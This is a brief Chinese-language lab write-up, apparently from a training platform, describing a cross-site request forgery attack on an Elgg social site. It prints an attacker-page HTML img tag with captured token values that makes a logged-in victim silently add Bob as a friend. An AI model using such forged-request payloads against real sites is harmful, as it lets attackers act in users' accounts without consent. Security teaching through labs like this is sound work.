实验楼实验之elgg系统攻击实验
有一个添加用户bob的请求链接如下:
http://www.csrflabelgg.com/ac...
我们可以在www.csrflabattacker.com构造一个页面,让合法登录用户访问后,就会添加bob为好友
<html>
<img src="http://www.csrflabelgg.com/ac...;__elgg_ts=1524817660&__elgg_token=f581b9c0b6fab2aa1c5b5c64a7b4cf0c">
</html> (注意这里的ts和token取当时环境抓包的值)
这样用户Alice在登录 http://www.csrflabelgg.com 后,再登录攻击网站,攻击语句就会生效。
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。